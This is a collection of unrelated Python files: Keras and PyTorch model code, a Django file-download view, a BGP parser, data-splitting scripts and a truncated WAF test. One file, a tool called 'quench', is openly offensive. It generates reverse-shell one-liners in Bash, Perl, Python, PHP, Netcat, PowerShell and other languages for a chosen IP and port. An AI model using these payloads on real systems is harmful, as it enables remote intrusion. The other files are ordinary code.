    # Encoder: three (1x1 conv -> pool 2) stages with 64 filters each.
    for _ in range(3):
        h = Conv2D(64, (1, 1), activation='relu', padding='valid')(h)
        h = MaxPooling2D(2)(h)
    # Decoder: two 64-filter upsampling stages, then project back to
    # N_CHANNELS and upsample to the input resolution.
    h = Conv2D(64, (1, 1), activation='relu', padding='valid')(h)
    h = UpSampling2D(2)(h)
    h = Conv2D(64, (1, 1), activation='relu', padding='valid')(h)
    h = UpSampling2D(2)(h)
    h = Conv2D(N_CHANNELS, (1, 1), activation='relu', padding='valid')(h)
    h = UpSampling2D(2)(h)
    model = Model(in_tensor, h)
    model.compile(optimizer=Adam(lr=10e-4), loss='mean_squared_error', metrics=['accuracy'])
    return model
def conv_autoencoder_2(shape=(None, MIDI_NOTES.shape[0], N_CHANNELS)):
    """3x3-conv autoencoder with same-padding.

    Encoder shrinks filter counts 32 -> 16 -> 8 while halving resolution;
    the decoder mirrors it (8 -> 16 -> 32) and a final sigmoid conv maps
    back to one channel.  Compiled with Adadelta(lr=10e-4) on MSE.
    """
    in_tensor = Input(shape=shape)
    h = in_tensor
    # Encoder: (conv 3x3 -> pool 2) stages.
    for filters in (32, 16, 8):
        h = Conv2D(filters, (3, 3), activation='relu', padding='same')(h)
        h = MaxPooling2D((2, 2), padding='same')(h)
    encoded = h  # bottleneck: 8 feature maps at 1/8 spatial resolution
    # Decoder: (conv 3x3 -> upsample 2) stages mirroring the encoder.
    for filters in (8, 16, 32):
        h = Conv2D(filters, (3, 3), activation='relu', padding='same')(h)
        h = UpSampling2D((2, 2))(h)
    decoded = Conv2D(1, (3, 3), activation='sigmoid', padding='same')(h)
    autoencoder = Model(in_tensor, decoded)
    autoencoder.compile(optimizer=Adadelta(lr=10e-4), loss='mean_squared_error')
    return autoencoder
def conv_vae():
    """Placeholder for a convolutional variational autoencoder (unimplemented)."""
    # TODO: To implement!
    return
# %%
autoencoder = conv_autoencoder_2()
autoencoder.summary()
# %%
# Checkpoint the best model by validation accuracy.
# NOTE(review): conv_autoencoder_2 compiles without an accuracy metric, so
# 'val_acc' may never appear in the logs — confirm the monitored key.
filepath = 'checkpoint/'
checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')
# Train with an all-zero input of the same shape as the targets.
# NOTE(review): feeding zeros means the encoder receives no signal —
# presumably a placeholder experiment; verify intent.
history = autoencoder.fit(
    x=np.zeros(shape=y.shape),
    y=y,
    batch_size=8,
    epochs=200,
    verbose=1,
    validation_split=0.15,
    callbacks=[TensorBoard(log_dir='/tmp/autoencoder'), checkpoint]
)
# %%
#----------------------------------------------- Predict -------------------------------------#
# Run the trained autoencoder on the second sample (batch of one).
predict = autoencoder.predict(x[1:2])
# %%
#---------------------------------------------- Show --------------------------------------------#
# Original piano-roll input (first sample, single channel).
plt.imshow(x[0,:,:,0])
# %%
#------------------------------------------------- Show -------------------------------------------#
# Reconstruction produced above.
# NOTE(review): predict[0] comes from x[1:2] while the previous cell shows
# x[0] — the compared samples differ; confirm the intended indices.
plt.imshow(predict[0,:,:,0])
# %%
x[0,:,:,0]
# %%
predict[0,:,:,0]
# %%
# decoded_imgs = autoencoder.predict(x_test)
# n = 10
# plt.figure(figsize=(20, 4))
# for i in range(n):
#     # display original
#     ax = plt.subplot(2, n, i)
#     plt.imshow(x_test[i].reshape(28, 28))
#     plt.gray()
#     ax.get_xaxis().set_visible(False)
#     ax.get_yaxis().set_visible(False)
#     # display reconstruction
#     ax = plt.subplot(2, n, i + n)
#     plt.imshow(decoded_imgs[i].reshape(28, 28))
#     plt.gray()
#     ax.get_xaxis().set_visible(False)
#     ax.get_yaxis().set_visible(False)
# plt.show()
# %%
#---------------------------------------------------- MIDI Write file ----------------------------------#
# Write a three-note phrase (MIDI 64, 62, 60) to composed.mid and read it back.
composed = MidiFile()
composed.ticks_per_beat = 96
track = MidiTrack()
# Each `time` is a delta in ticks since the previous message.
track.append(Message('note_on', note=64, velocity=64, time=0))
track.append(Message('note_on', note=62, velocity=64, time=200))
track.append(Message('note_on', note=60, velocity=64, time=200))
track.append(Message('note_off', note=64, velocity=64, time=200))
track.append(Message('note_off', note=62, velocity=64, time=200))
track.append(Message('note_off', note=60, velocity=64, time=200))
composed.tracks.append(track)
composed.save('composed.mid')
# %%
compo = MidiFile('composed.mid')
#--------------------------------------------------Test--------------------------------------------------------#
from keras.layers import LSTM, TimeDistributed
# Dummy LSTM model
def dummyModel():
    """Toy model: LSTM(128) over variable-length (None, 5) sequences with a
    single sigmoid output unit.

    NOTE(review): sparse_categorical_crossentropy with a 1-unit sigmoid head
    can only represent class 0, and train_generator() yields one-hot
    targets — the loss/head pairing looks inconsistent; verify.
    """
    in_tensor = Input (shape=(None, 5))
    tensor = LSTM(128, activation='relu')(in_tensor)
    tensor = Dense(1, activation='sigmoid')(tensor)
    model = Model(in_tensor, tensor)
    model.compile(optimizer='sgd', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
    return model
# %%
# Instantiate the toy model and print its layer summary.
model = dummyModel()
model.summary()
# %%
def train_generator():
    """Endless generator of random batches with a fresh sequence length
    (10..99) per batch."""
    while True:
        sequence_length = np.random.randint(10, 100)
        x_train = np.random.random((1000, sequence_length, 5))
        # Targets are the first feature of the first timestep — floats in
        # [0, 1) — so to_categorical floors them all to class 0, giving
        # y_train shape (1000, 1).
        y_train = x_train[:,0,0]
        y_train = to_categorical(y_train)
        yield x_train, y_train
# %%
model.fit_generator(train_generator(), steps_per_epoch=30, epochs=10, verbose=1)
# %%
# Inspect one batch shape from the generator.
# BUG FIX: train_generator() yields forever, so the original
# `for x, y in train_generator(): print(x.shape)` loop never terminated.
for x, y in train_generator():
    print(x.shape)
    break
# %%
from keras.layers import TimeDistributed
def lstm_3d():
    """Single-layer LSTM (64 units) over fixed (10, 10) sequences with a
    10-way sigmoid head; compiled with SGD on categorical crossentropy."""
    inputs = Input(shape=(10, 10))
    hidden = LSTM(64, activation='relu')(inputs)
    outputs = Dense(10, activation='sigmoid')(hidden)
    net = Model(inputs, outputs)
    net.compile(optimizer='sgd', loss='categorical_crossentropy', metrics=['acc'])
    return net
# %%
model = lstm_3d()
model.summary()
# %%
# %%
# Synthetic data: 100 samples of shape (10, 10) with sparse random labels.
x = np.arange(10000).reshape((100,10,10))
y = np.zeros(shape=(100,10))
# Scatter 300 random 1s into the label matrix (collisions allowed, so some
# rows stay all-zero and others get several positives).
for i in range(300):
    a = random.randint(0, 99)
    b = random.randint(0, 9)
    y[a][b] = 1
# %%
model.fit(x, y, batch_size=10, epochs=100)
# %%
model.predict(x[:5])
#!/usr/bin/python3
import os
import sys
import getopt
import subprocess
import requests
import pathlib
def main(argv):
    """Parse CLI options and print reverse-shell one-liners for the chosen
    payload type, or update/install the tool itself.

    BUG FIX: the option dispatch used `opt in "--update"` / `opt in
    "--install"`, which are substring tests (e.g. "-i" is a substring of
    "--install") — replaced with equality checks.  The local variable
    `type` was renamed to `ptype` to stop shadowing the builtin.
    """
    global ipaddress
    info = """Arguments:\n  -i, --ip  ==> IP Address\n  -p, --port  ==> Port Number\n  -t, --type  ==> Payload Type\n  --update  ==> Update To The Latest Version\n  --install  ==> Install To '/usr/local/bin/' Directory\nUsage:\n  quench -i <IP Address> -p <Port Number> -t <Payload Type>\n  quench -i 127.0.0.1 -p 4444 -t php\n  quench --ip 192.168.1.1 --port 1337 --type awk\n  quench --update\n  quench --install\nPayload Types:\n  Bash  ==>  sh\n  Perl  ==>  pl\n  Python  ==>  py\n  Socat  ==>  sc\n  PHP  ==>  php\n  Ruby  ==>  rb\n  Netcat  ==>  nc\n  Golang  ==>  go\n  AWK  ==>  awk\n  Lua  ==>  lua\n  PowerShell  ==>  ps"""
    ip = ''
    port = ''
    file = pathlib.Path("/usr/local/bin/quench")
    url = "https://enesozeser.com/"
    timeout = 5
    # Probe connectivity once; several branches below depend on it.
    try:
        requests.get(url, timeout=timeout)
        internet = 1
    except (requests.ConnectionError, requests.Timeout):
        internet = 0
    if internet == 1:
        getpublic = subprocess.Popen("dig +short myip.opendns.com @resolver1.opendns.com", shell=True, stdout=subprocess.PIPE).stdout
        public = getpublic.read()
        getlocal = subprocess.Popen("hostname -I | awk '{print $1}'", shell=True, stdout=subprocess.PIPE).stdout
        local = getlocal.read()
        ipaddress = """IP Address:\n  Local(eth/wlan) IP Address  ==>  %s\n  Public IP Address  ==>  %s""" %(local[:-1].decode(), public[:-1].decode())
    if len(sys.argv) == 1:
        print(info)
        if internet == 1:
            print(ipaddress)
    try:
        opts, args = getopt.getopt(argv,"i:p:t:",["ip=","port=","type=","update","install"])
    except getopt.GetoptError:
        print(info)
        if internet == 1:
            print(ipaddress)
        sys.exit(2)
    for opt, arg in opts:
        if opt in ("-i", "--ip"):
            ip = arg
        elif opt in ("-p", "--port"):
            port = arg
        elif opt == "--update":
            if internet == 1:
                if file.exists():
                    os.system('rm -f /usr/local/bin/quench')
                    os.system('wget https://raw.githubusercontent.com/enesozeser/Quench/master/quench.py -P /usr/local/bin/')
                    os.system('mv /usr/local/bin/quench.py /usr/local/bin/quench')
                    os.system('chmod a+x /usr/local/bin/quench')
                    os.system('sleep 2')
                    print("Quench is updated. Use 'quench' command for all information.")
                else:
                    print("Quench is not installed. Use './quench --install' command before updating.")
            else:
                print("Quench could not be updated. Check your internet connection.")
        elif opt == "--install":
            if file.exists():
                print("Quench is already installed. Use 'quench' command for all information.")
            else:
                os.system('cp quench.py /usr/local/bin/')
                os.system('mv /usr/local/bin/quench.py /usr/local/bin/quench')
                os.system('chmod a+x /usr/local/bin/quench')
                os.system('sleep 2')
                print("Quench is installed. Use 'quench' command for all information.")
        if opt in ("-t", "--type"):
            ptype = arg
            if ptype == "sh":
                print("""Bash-TCP  ==>  bash -i >& /dev/tcp/%s/%s 0>&1""" %(ip,port))
                print("""Bash-TCP  ==>  0<&196;exec 196<>/dev/tcp/%s/%s; sh <&196 >&196 2>&196""" %(ip, port))
                print("""Bash-UDP  ==>  bash -i >& /dev/udp/%s/%s 0>&1""" %(ip,port))
                print("""Bash-UDP  ==>  0<&196;exec 196<>/dev/udp/%s/%s; sh <&196 >&196 2>&196""" %(ip,port))
            elif ptype == "pl":
                print("""Perl  ==>  perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" %(ip,port))
                print("""Perl  ==>  perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"%s:%s");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'""" %(ip,port))
            elif ptype == "py":
                print("""Python-IPv4  ==>  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'""" %(ip,port))
                print("""Python-IPv4  ==>  export RHOST="%s";export RPORT=%s;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'""" %(ip,port))
                print("""Python-IPv6  ==>  python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("%s",%s,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'""" %(ip,port))
                print("""Python-IPv6  ==>  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" %(ip,port))
            elif ptype == "php":
                print("""PHP  ==>  php -r '$sock=fsockopen("%s",%s);exec("/bin/sh -i <&3 >&3 2>&3");'""" %(ip,port))
                print("""PHP  ==>  php -r '$sock=fsockopen("%s",%s);shell_exec("/bin/sh -i <&3 >&3 2>&3");'""" %(ip,port))
                print("""PHP  ==>  php -r '$sock=fsockopen("%s",%s);`/bin/sh -i <&3 >&3 2>&3`;'""" %(ip,port))
                print("""PHP  ==>  php -r '$sock=fsockopen("%s",%s);system("/bin/sh -i <&3 >&3 2>&3");'""" %(ip,port))
                print("""PHP  ==>  php -r '$sock=fsockopen("%s",%s);passthru("/bin/sh -i <&3 >&3 2>&3");'""" %(ip,port))
                print("""PHP  ==>  php -r '$sock=fsockopen("%s",%s);popen("/bin/sh -i <&3 >&3 2>&3", "r");'""" %(ip,port))
                print("""PHP  ==>  php -r '$sock=fsockopen("%s",%s);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'""" %(ip,port))
            elif ptype == "sc":
                print("""Socat  ==>  socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:%s:%s""" %(ip,port))
            elif ptype == "rb":
                print("""Ruby  ==>  ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["%s"],ENV["%s"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' """ %(ip,port))
            elif ptype == "nc":
                print("""Netcat-TCP  ==>  nc %s %s -e /bin/bash""" %(ip,port))
                print("""Netcat-UDP  ==>  nc --udp %s %s -e /bin/bash""" %(ip,port))
            elif ptype == "go":
                print("""Golang  ==>  echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","%s:%s");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go""" %(ip,port))
            elif ptype == "awk":
                print("""AWK  ==>  awk 'BEGIN {s = "/inet/tcp/0/%s/%s"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null""" %(ip,port))
            elif ptype == "lua":
                print("""Lua  ==>  lua -e "require('socket');require('os');t=socket.tcp();t:connect('%s','%s');os.execute('/bin/sh -i <&3 >&3 2>&3');" """ %(ip,port))
            elif ptype == "ps":
                print("""PowerShell  ==>  $client = New-Object System.Net.Sockets.TCPClient("%s",%s);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()""" %(ip,port))
            else:
                print("You entered invalid payload type. You must to use one of these ==> sh, pl, py, socat, php, rb, nc, go, awk, lua, ps")
if __name__ == "__main__":
    main(sys.argv[1:])
|
__author__ = 'ibrahim (at) sikilabs (dot) com'
__licence__ = 'MIT'
from django.shortcuts import RequestContext
from django.template import loader
from django.http import HttpResponse
from django.conf import settings
import datetime
import os
from main.unique.models import UniqueUrl
# import unique url object
# Resolve the dotted path in settings.UNIQUE_URL_OBJECT (e.g. "app.models.Doc")
# into a class object once, at module import time.
modlist = settings.UNIQUE_URL_OBJECT.split(".")
_module = ".".join(modlist[:-1])
_class = modlist[-1]
module_to_import_from = __import__(_module, fromlist=[_class])
class_to_import = getattr(module_to_import_from, _class)
def get_file(request, unique_url):
    """
    Serve the file behind a unique URL as an attachment, or render an
    error page when the link has expired (status=1) or its download
    quota is exhausted (status=2).
    """
    my_unique = UniqueUrl.objects.get(url=unique_url)
    if my_unique.clics < settings.UNIQUE_MAX_CLICS:
        if datetime.date.today() < my_unique.expiration_date:
            my_object_id = my_unique.decode_url(my_unique.url_hash,
                                                my_unique.url)[2]
            my_object = class_to_import.objects.get(id=my_object_id)
            # BUG FIX: open in binary mode and close the handle — text mode
            # corrupts binary files and the handle previously leaked.
            with open(settings.MEDIA_ROOT + my_object.path, 'rb') as myfile:
                payload = myfile.read()
            fname, extension = os.path.splitext(my_object.path)
            # BUG FIX: splitext keeps the leading dot; strip it so the
            # content type is e.g. application/pdf, not application/.pdf.
            response = HttpResponse(payload,
                                    content_type='application/' + extension.lstrip('.'))
            response['Content-Disposition'] = "attachment; filename=" + my_object.original_filename
            my_unique.clics += 1
            my_unique.save()
            return response
        else:
            t = loader.get_template('unique/download_error.html')
            c = RequestContext(request, {'status': 1})  # expiration passed
            return HttpResponse(t.render(c))
    else:
        t = loader.get_template('unique/download_error.html')
        c = RequestContext(request, {'status': 2})  # max download reached
        return HttpResponse(t.render(c))
def generate_url(request, object_id):
    """
    generate unique url from object id

    Looks up (or creates) the UniqueUrl row tying the current user to the
    referenced object, then encodes the URL on it.

    NOTE(review): this view returns None, which is not a valid Django
    response — presumably it should return an HttpResponse carrying the
    generated URL; confirm intended behavior.
    """
    unique_object = class_to_import.objects.get(id=object_id)
    # EAFP: reuse an existing link for this user/object pair, else create one.
    try:
        my_unique = UniqueUrl.objects.get(user=request.user,
                                          ref_object=unique_object)
    except UniqueUrl.DoesNotExist:
        my_unique = UniqueUrl.objects.create(user=request.user,
                                             expiration_date=settings.UNIQUE_EXP_DATE,
                                             ref_object=unique_object, clics=0)
    my_unique.encode_url()
|
def forward(x, W1, W2, W3, training=False):
    """Three-layer MLP forward pass: tanh, tanh with dropout, linear output.

    Layer-2 activations are zeroed with probability 0.5 during training;
    at inference they are scaled by 0.5 instead (classic non-inverted
    dropout), keeping expected activations consistent between modes.
    Returns (y1, y2, y3, m2): both hidden activations, the output, and
    the dropout mask (or the 0.5 scale factor).
    """
    y1 = np.tanh(np.dot(x, W1))
    y2 = np.tanh(np.dot(y1, W2))
    # Dropout gate for layer 2: random binary mask while training,
    # constant 0.5 scale otherwise.
    m2 = np.random.binomial(1, 0.5, size=y2.shape) if training else 0.5
    y2 = y2 * m2
    y3 = np.dot(y2, W3)  # linear output layer
    return y1, y2, y3, m2
def backward(x, y1, y2, y3, m2, t, W1, W2, W3):
    """Backpropagation through the net defined in forward().

    Relies on module-level dC (cost gradient at the output) and dtanh
    (tanh derivative expressed via the activation).  The layer-2 gradient
    is gated by the dropout mask m2 saved from the forward pass.
    Returns the weight gradients (dC_dW1, dC_dW2, dC_dW3).
    """
    delta3 = dC(y3, t)  # output layer is linear, so dz3 == dy3
    grad_W3 = np.dot(y2.T, delta3)
    delta2 = np.dot(delta3, W3.T) * dtanh(y2) * m2  # dropout gate
    grad_W2 = np.dot(y1.T, delta2)
    delta1 = np.dot(delta2, W2.T) * dtanh(y1)
    grad_W1 = np.dot(x.T, delta1)
    return grad_W1, grad_W2, grad_W3
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from models.networks.base_network import BaseNetwork
from models.networks.normalization import get_norm_layer
from models.networks.architecture import ResnetBlock as ResnetBlock
from models.networks.architecture import FADEResnetBlock as FADEResnetBlock
from models.networks.stream import Stream as Stream
from models.networks.AdaIN.function import adaptive_instance_normalization as FAdaIN
class TSITGenerator(BaseNetwork):
    """TSIT generator.

    A content stream (and, unless --no_ss, a style stream) produce
    multi-scale feature pyramids; the decoder stacks FADE resnet blocks
    fed by the content features, while fadain_alpha injects style
    statistics at each matching scale.
    """
    @staticmethod
    def modify_commandline_options(parser, is_train):
        parser.set_defaults(norm_G='spectralfadesyncbatch3x3')
        parser.add_argument('--num_upsampling_layers',
                            choices=('normal', 'more', 'most'), default='more',
                            help="If 'more', adds upsampling layer between the two middle resnet blocks."
                                 "If 'most', also add one more upsampling + resnet layer at the end of the generator."
                                 "We only use 'more' as the default setting.")
        return parser
    def __init__(self, opt):
        super().__init__()
        self.opt = opt
        nf = opt.ngf
        self.content_stream = Stream(self.opt)
        # Style stream is optional (disabled via --no_ss).
        self.style_stream = Stream(self.opt) if not self.opt.no_ss else None
        self.sw, self.sh = self.compute_latent_vector_size(opt)
        if opt.use_vae:
            # In case of VAE, we will sample from random z vector
            self.fc = nn.Linear(opt.z_dim, 16 * nf * self.sw * self.sh)
        else:
            # Otherwise, we make the network deterministic by starting with
            # downsampled segmentation map (content) instead of random z
            self.fc = nn.Conv2d(self.opt.semantic_nc, 16 * nf, 3, padding=1)
        self.head_0 = FADEResnetBlock(16 * nf, 16 * nf, opt)
        self.G_middle_0 = FADEResnetBlock(16 * nf, 16 * nf, opt)
        self.G_middle_1 = FADEResnetBlock(16 * nf, 16 * nf, opt)
        self.up_0 = FADEResnetBlock(16 * nf, 8 * nf, opt)
        self.up_1 = FADEResnetBlock(8 * nf, 4 * nf, opt)
        self.up_2 = FADEResnetBlock(4 * nf, 2 * nf, opt)
        self.up_3 = FADEResnetBlock(2 * nf, 1 * nf, opt)
        final_nc = nf
        if opt.num_upsampling_layers == 'most':
            self.up_4 = FADEResnetBlock(1 * nf, nf // 2, opt)
            final_nc = nf // 2
        self.conv_img = nn.Conv2d(final_nc, 3, 3, padding=1)
        self.up = nn.Upsample(scale_factor=2)
    def compute_latent_vector_size(self, opt):
        """Spatial size (sw, sh) of the deepest latent, derived from the
        crop size, aspect ratio and the number of upsampling layers."""
        if opt.num_upsampling_layers == 'normal':
            num_up_layers = 6
        elif opt.num_upsampling_layers == 'more':
            num_up_layers = 7
        elif opt.num_upsampling_layers == 'most':
            num_up_layers = 8
        else:
            raise ValueError('opt.num_upsampling_layers [%s] not recognized' %
                             opt.num_upsampling_layers)
        sw = opt.crop_size // (2**num_up_layers)
        sh = round(sw / opt.aspect_ratio)
        return sw, sh
    def fadain_alpha(self, content_feat, style_feat, alpha=1.0, c_mask=None, s_mask=None):
        # FAdaIN performs AdaIN on the multi-scale feature representations;
        # alpha blends the stylized features with the raw content features.
        assert 0 <= alpha <= 1
        t = FAdaIN(content_feat, style_feat, c_mask, s_mask)
        t = alpha * t + (1 - alpha) * content_feat
        return t
    def forward(self, input, real, z=None):
        """Decode `input` (content) stylized by `real`; optional latent z
        is used only in the VAE configuration."""
        content = input
        style = real
        ft0, ft1, ft2, ft3, ft4, ft5, ft6, ft7 = self.content_stream(content)
        sft0, sft1, sft2, sft3, sft4, sft5, sft6, sft7 = self.style_stream(style) if not self.opt.no_ss else [None] * 8
        if self.opt.use_vae:
            # we sample z from unit normal and reshape the tensor
            # NOTE(review): content.get_device() fails on CPU tensors —
            # confirm GPU-only usage or switch to content.device.
            if z is None:
                z = torch.randn(content.size(0), self.opt.z_dim,
                                dtype=torch.float32, device=content.get_device())
            x = self.fc(z)
            x = x.view(-1, 16 * self.opt.ngf, self.sh, self.sw)
        else:
            if self.opt.task == 'SIS':
                # following SPADE, downsample segmap and run convolution for SIS
                x = F.interpolate(content, size=(self.sh, self.sw))
            else:
                # sample random noise
                x = torch.randn(content.size(0), 3, self.sh, self.sw, dtype=torch.float32, device=content.get_device())
            x = self.fc(x)
        # Decoder: alternate style injection (FAdaIN), FADE blocks and
        # 2x upsampling, consuming the content pyramid deepest-first.
        x = self.fadain_alpha(x, sft7, alpha=self.opt.alpha) if not self.opt.no_ss else x
        x = self.head_0(x, ft7)
        x = self.up(x)
        x = self.fadain_alpha(x, sft6, alpha=self.opt.alpha) if not self.opt.no_ss else x
        x = self.G_middle_0(x, ft6)
        if self.opt.num_upsampling_layers == 'more' or \
           self.opt.num_upsampling_layers == 'most':
            x = self.up(x)
        x = self.fadain_alpha(x, sft5, alpha=self.opt.alpha) if not self.opt.no_ss else x
        x = self.G_middle_1(x, ft5)
        x = self.up(x)
        x = self.fadain_alpha(x, sft4, alpha=self.opt.alpha) if not self.opt.no_ss else x
        x = self.up_0(x, ft4)
        x = self.up(x)
        x = self.fadain_alpha(x, sft3, alpha=self.opt.alpha) if not self.opt.no_ss else x
        x = self.up_1(x, ft3)
        x = self.up(x)
        x = self.fadain_alpha(x, sft2, alpha=self.opt.alpha) if not self.opt.no_ss else x
        x = self.up_2(x, ft2)
        x = self.up(x)
        x = self.fadain_alpha(x, sft1, alpha=self.opt.alpha) if not self.opt.no_ss else x
        x = self.up_3(x, ft1)
        x = self.up(x)
        if self.opt.num_upsampling_layers == 'most':
            ft0 = self.up(ft0)
            x = self.fadain_alpha(x, sft0, alpha=self.opt.alpha) if not self.opt.no_ss else x
            x = self.up_4(x, ft0)
            x = self.up(x)
        x = self.conv_img(F.leaky_relu(x, 2e-1))
        # BUG FIX: F.tanh is deprecated (removed in recent PyTorch);
        # torch.tanh is the supported equivalent.
        x = torch.tanh(x)
        return x
class Pix2PixHDGenerator(BaseNetwork):
    """Global generator from pix2pixHD: reflection-padded initial conv,
    strided downsampling, a stack of resnet blocks, mirrored
    transposed-conv upsampling, and a tanh output head."""
    @staticmethod
    def modify_commandline_options(parser, is_train):
        parser.add_argument('--resnet_n_downsample', type=int, default=4, help='number of downsampling layers in netG')
        parser.add_argument('--resnet_n_blocks', type=int, default=9, help='number of residual blocks in the global generator network')
        parser.add_argument('--resnet_kernel_size', type=int, default=3,
                            help='kernel size of the resnet block')
        parser.add_argument('--resnet_initial_kernel_size', type=int, default=7,
                            help='kernel size of the first convolution')
        parser.set_defaults(norm_G='instance')
        return parser
    def __init__(self, opt):
        super().__init__()
        # One extra input channel each for the "don't care" label and the
        # instance map, when those options are enabled.
        input_nc = opt.label_nc + (1 if opt.contain_dontcare_label else 0) + (0 if opt.no_instance else 1)
        norm_layer = get_norm_layer(opt, opt.norm_G)
        activation = nn.ReLU(False)
        model = []
        # initial conv
        model += [nn.ReflectionPad2d(opt.resnet_initial_kernel_size // 2),
                  norm_layer(nn.Conv2d(input_nc, opt.ngf,
                                       kernel_size=opt.resnet_initial_kernel_size,
                                       padding=0)),
                  activation]
        # downsample: double the channel count at each stride-2 conv
        mult = 1
        for i in range(opt.resnet_n_downsample):
            model += [norm_layer(nn.Conv2d(opt.ngf * mult, opt.ngf * mult * 2,
                                           kernel_size=3, stride=2, padding=1)),
                      activation]
            mult *= 2
        # resnet blocks
        for i in range(opt.resnet_n_blocks):
            model += [ResnetBlock(opt.ngf * mult,
                                  norm_layer=norm_layer,
                                  activation=activation,
                                  kernel_size=opt.resnet_kernel_size)]
        # upsample: mirror the downsampling path with transposed convs
        for i in range(opt.resnet_n_downsample):
            nc_in = int(opt.ngf * mult)
            nc_out = int((opt.ngf * mult) / 2)
            model += [norm_layer(nn.ConvTranspose2d(nc_in, nc_out,
                                                    kernel_size=3, stride=2,
                                                    padding=1, output_padding=1)),
                      activation]
            mult = mult // 2
        # final output conv
        # NOTE(review): nc_out is bound inside the loop above, so
        # resnet_n_downsample == 0 would leave it undefined here (the
        # default of 4 avoids this today).
        model += [nn.ReflectionPad2d(3),
                  nn.Conv2d(nc_out, opt.output_nc, kernel_size=7, padding=0),
                  nn.Tanh()]
        self.model = nn.Sequential(*model)
    def forward(self, input, z=None):
        # z is accepted for interface parity with other generators; unused.
        return self.model(input)
|
from tabulate import tabulate

# Sample BGP table entries: flags, prefix, next hop, metric, AS path, origin.
entry1 = "* 1.0.192.0/18 157.130.10.233 0 701 38040 9737 i"
entry2 = "* 1.1.1.0/24 157.130.10.233 0 701 1299 15169 i"
entry3 = "* 1.1.42.0/24 157.130.10.233 0 701 9505 17408 2.1465 i"
entry4 = "* 1.0.192.0/19 157.130.10.233 0 701 6762 6762 6762 6762 38040 9737 i"

ent1 = entry4.split()
prefix = ent1[1]       # destination prefix
asn = ent1[4:-1]       # AS path: everything between the metric and the origin code
# Fixed: the original used the Python 2 print statement, a syntax error on
# Python 3; also dropped the unused ent2 variable.
print(tabulate([[prefix, asn]], headers=['Prefix', 'ASN']))
|
import pandas as pd
import re
import numpy as np
import os
import sys
from collections import OrderedDict

# Source SESEDS dataset (absolute path kept from the original script).
SESEDS_CSV = "C:\\Users\\THINKPAD\\PycharmProjects\\MCM-ICM-2018-Problem-C\\data\\csv\\seseds.csv"
# Directory where the per-state CSV extracts are written.
OUT_DIR = "C:/Users/THINKPAD/PycharmProjects/MCM-ICM-2018-Problem-C/data/csv"

seseds = pd.read_csv(SESEDS_CSV, skiprows=None, engine='c', low_memory=True)

# Columns exported for every state, in the original output order.
COLUMNS = ["MSN", "StateCode", "Year", "Data"]

# One vectorised boolean-mask pass per state replaces the original
# O(rows) Python loop that appended to 16 parallel lists and rebuilt a
# shared OrderedDict four times.  `str.contains` matches the original
# `re.search(state, code)` substring semantics.
for state, out_name in (("AZ", "az_data.csv"), ("CA", "ca_data.csv"),
                        ("NM", "nm_data.csv"), ("TX", "tx_data.csv")):
    subset = seseds.loc[seseds["StateCode"].str.contains(state), COLUMNS]
    subset.to_csv(os.path.join(OUT_DIR, out_name),
                  index=False, index_label=False, sep=',')
|
# Sum the fuel requirement (mass // 3 - 2) over every module mass listed
# one per line in input.txt.
result = 0
with open('input.txt') as fp:
    for line in fp:
        result += int(line) // 3 - 2
print(str(result))
|
import os
import uuid
import filecmp
import BaseHTTPServer
import threading
import functools
from ftw_compatible_tool import base
from ftw_compatible_tool import context
from ftw_compatible_tool import broker
from ftw_compatible_tool import database
from ftw_compatible_tool import traffic
import common
def warning_as_error(*details):
    """Broker WARNING hook that escalates any warning into a ValueError."""
    raise ValueError(*details)
def test_commands_dispatch():
    """Commands registered in BaseConf must be routed to their handlers."""

    class CallRecorder(object):
        # Records how many times it is invoked and asserts each call's
        # argument matches the value set via expect().
        def __init__(self):
            self.count = 0

        def expect(self, expected):
            self.expected = expected

        def __call__(self, target):
            assert target == self.expected
            self.count += 1

    ctx = context.Context(broker.Broker())
    ctx.broker.subscribe(broker.TOPICS.WARNING, warning_as_error)

    recorder = CallRecorder()
    conf = base.BaseConf(functions={
